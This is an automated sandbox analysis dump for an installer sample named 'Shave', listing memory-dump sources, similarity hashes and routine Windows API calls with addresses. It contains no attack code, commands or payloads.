                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2667972263-0
                                                                                                                                • Opcode ID: 4c7fd7b1f91375a2558ff4a0a047554b9ac13023ec1a621a7b7447f5a49afdce
                                                                                                                                • Instruction ID: 9b62f472eb3a95df078ad497759be9c31f6c15c11f60cf08f6005a6c9cb4e6e4
                                                                                                                                • Opcode Fuzzy Hash: 4c7fd7b1f91375a2558ff4a0a047554b9ac13023ec1a621a7b7447f5a49afdce
                                                                                                                                • Instruction Fuzzy Hash: 9921BFB1C00128BBCF116FA5DE49D9E7E79EF09364F14423AF960762E0CB794C419B98
                                                                                                                                APIs
                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsa5D43.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsa5D43.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                                                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa5D43.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsa5D43.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsa5D43.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ByteCharMultiWidelstrlen
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsa5D43.tmp$C:\Users\user\AppData\Local\Temp\nsa5D43.tmp\System.dll
                                                                                                                                • API String ID: 3109718747-3128672583
                                                                                                                                • Opcode ID: 2806917471d26587652065b68c97e9d93b9fed1128aa7c726bb62807fa0de6fb
                                                                                                                                • Instruction ID: 4bb1670e371a3de23f361dcee459543bcfcf4636ee0f51b5b5a9e7d0ab821041
                                                                                                                                • Opcode Fuzzy Hash: 2806917471d26587652065b68c97e9d93b9fed1128aa7c726bb62807fa0de6fb
                                                                                                                                • Instruction Fuzzy Hash: DB11CB72A05300BEDB046FB18E8999F7664AF54399F20843FF502F61D1D9FC89415B5E
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2386745512.000000006F971000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F970000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2386728456.000000006F970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2386788272.000000006F973000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2386807263.000000006F975000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_6f970000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeGlobal
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2979337801-0
                                                                                                                                • Opcode ID: 47851ca925c4dafe9f47323cc165c362acc9b55516abc9bf460e7b858e534f36
                                                                                                                                • Instruction ID: 86150b22d06648efdcf461b3072344060ee21d9f68b9dfeef76099e9ab7aa54a
                                                                                                                                • Opcode Fuzzy Hash: 47851ca925c4dafe9f47323cc165c362acc9b55516abc9bf460e7b858e534f36
                                                                                                                                • Instruction Fuzzy Hash: 9651C631D043599B8BB99FB885605ADBBB9EF97354B10426BD410A71C0EF70FAC18B91
                                                                                                                                APIs
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 6F9724DA
                                                                                                                                  • Part of subcall function 6F97122C: lstrcpynW.KERNEL32(00000000,?,6F9712DF,00000019,6F9711BE,-000000A0), ref: 6F97123C
                                                                                                                                • GlobalAlloc.KERNEL32(00000040), ref: 6F972460
                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6F97247B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2386745512.000000006F971000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F970000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2386728456.000000006F970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2386788272.000000006F973000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2386807263.000000006F975000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_6f970000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4216380887-0
                                                                                                                                • Opcode ID: 964d3c33c461d5fea706ba6121f0215d4f4c69059f746ab14d9b37de8a9f1ee8
                                                                                                                                • Instruction ID: a22b54aa16595637f0ecc5e6cf7c17c4078b3ee921ad7a3a8395e86f52b73f8c
                                                                                                                                • Opcode Fuzzy Hash: 964d3c33c461d5fea706ba6121f0215d4f4c69059f746ab14d9b37de8a9f1ee8
                                                                                                                                • Instruction Fuzzy Hash: 1E41CAB0128705EFD7349F39D844A6677E8FB96320B004A5EE546CA5C2EF30E585CF61
                                                                                                                                APIs
                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6F9721F0,?,00000808), ref: 6F971639
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6F9721F0,?,00000808), ref: 6F971640
                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6F9721F0,?,00000808), ref: 6F971654
                                                                                                                                • GetProcAddress.KERNEL32(6F9721F0,00000000), ref: 6F97165B
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 6F971664
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2386745512.000000006F971000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F970000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2386728456.000000006F970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2386788272.000000006F973000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2386807263.000000006F975000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_6f970000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1148316912-0
                                                                                                                                • Opcode ID: 917ed7d6600c0dff7818a391e4f8336214910dfb5ecef316da52116e435dc974
                                                                                                                                • Instruction ID: 6e6ef1001e5c97f3211b41ddf54d6550d06aed20a624b0f7deb1c53214048d33
                                                                                                                                • Opcode Fuzzy Hash: 917ed7d6600c0dff7818a391e4f8336214910dfb5ecef316da52116e435dc974
                                                                                                                                • Instruction Fuzzy Hash: F6F0AC7220A6387BEA2116B78C4DC9BBE9CDF8B2F5B110215F6289219096619D11DBF1
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1849352358-0
                                                                                                                                • Opcode ID: 9f3e8361c5455c25eedd40ad678b741ea6618978e593034b97affd3e1747e9e4
                                                                                                                                • Instruction ID: 7e4da700d615158f321032e6dee441e0afa22e46251462cde10931eea5e4b44d
                                                                                                                                • Opcode Fuzzy Hash: 9f3e8361c5455c25eedd40ad678b741ea6618978e593034b97affd3e1747e9e4
                                                                                                                                • Instruction Fuzzy Hash: 59F0EC72A04518AFDB41DBE4DE88CEEB7BCEB48301B14446AF641F61A0CA749D519B38
                                                                                                                                APIs
                                                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                                • String ID: !
                                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                                • Opcode ID: 3974eff3514ac80dd6c1aa8123252385dbc5481e5078a21275b56949e15273d0
                                                                                                                                • Instruction ID: 5915ba61491c244e76e1eaab0aa102c6a5e0f3d841db56a12d121f6c77e1b82d
                                                                                                                                • Opcode Fuzzy Hash: 3974eff3514ac80dd6c1aa8123252385dbc5481e5078a21275b56949e15273d0
                                                                                                                                • Instruction Fuzzy Hash: E621C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605F61D0D7B889409B18
                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
                                                                                                                                • wsprintfW.USER32 ref: 00404B65
                                                                                                                                • SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                                • String ID: %u.%u%s%s
                                                                                                                                • API String ID: 3540041739-3551169577
                                                                                                                                • Opcode ID: e544acf4f0842c60a9c18385703c419e840f736fd1e164df9e130a51ba0441a7
                                                                                                                                • Instruction ID: c6a8333de7f2a0e63f9e82a7fb0d3590b97a2c0368f8d4fe0eecd184368e2ceb
                                                                                                                                • Opcode Fuzzy Hash: e544acf4f0842c60a9c18385703c419e840f736fd1e164df9e130a51ba0441a7
                                                                                                                                • Instruction Fuzzy Hash: 5711DB736041282BDB00656D9C41F9E329CDB86334F15423BFB25F21D1D978DC1186E8
                                                                                                                                APIs
                                                                                                                                • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsa5D43.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nsa5D43.tmp,C:\Users\user\AppData\Local\Temp\nsa5D43.tmp,?,?,75923420,004059C9,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405C25
                                                                                                                                • CharNextW.USER32(00000000), ref: 00405C2A
                                                                                                                                • CharNextW.USER32(00000000), ref: 00405C42
                                                                                                                                Strings
                                                                                                                                • C:\Users\user\AppData\Local\Temp\nsa5D43.tmp, xrefs: 00405C18
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharNext
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsa5D43.tmp
                                                                                                                                • API String ID: 3213498283-1113152414
                                                                                                                                • Opcode ID: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
                                                                                                                                • Instruction ID: 6a9d977fbe5713998eb834b7ad01fe533960ca492682b5c2b36711c34b001c28
                                                                                                                                • Opcode Fuzzy Hash: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
                                                                                                                                • Instruction Fuzzy Hash: DDF0F061808B1095FB3176644C88E7B66BCEB55360B04803BE641B72C0D3B84DC18EAA
                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403359,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 00405B72
                                                                                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403359,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 00405B7C
                                                                                                                                • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B8E
                                                                                                                                Strings
                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B6C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                • API String ID: 2659869361-823278215
                                                                                                                                • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                                • Instruction ID: 803477e47080facc391f0cecd2807ccdb00b9d1fdb40608b9d44cb66137c19bb
                                                                                                                                • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                                • Instruction Fuzzy Hash: 3BD0A731501A30AAC111BB449D04DDF72ACDE45304342047FF101B31A2C7BC2D5287FD
                                                                                                                                APIs
                                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2342217164.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Shave.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Close$Enum
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 464197530-0
                                                                                                                                • Opcode ID: 1341f91fd8d518b2ca140e0133bcf02bd0ea54a7f691716fe820626e10176459
                                                                                                                                • Instruction ID: 4ebe2cb43181949e29f1e9fb79ae388d5d3e17bd3db4e8cfc4c1202d027f6d8e
                                                                                                                                • Opcode Fuzzy Hash: 1341f91fd8d518b2ca140e0133bcf02bd0ea54a7f691716fe820626e10176459
                                                                                                                                • Instruction Fuzzy Hash: FB116A32500108FBDF02AB90CE49FEE7B7DAF44340F110076B905B51E1E7B59E21AB58
                                                                                                                                APIs
                                                                                                                                • DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                                                                                • GetTickCount.KERNEL32 ref: 00402EAA
                                                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                                                                                • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2341855060.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2341825897.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341879473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2341891387.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
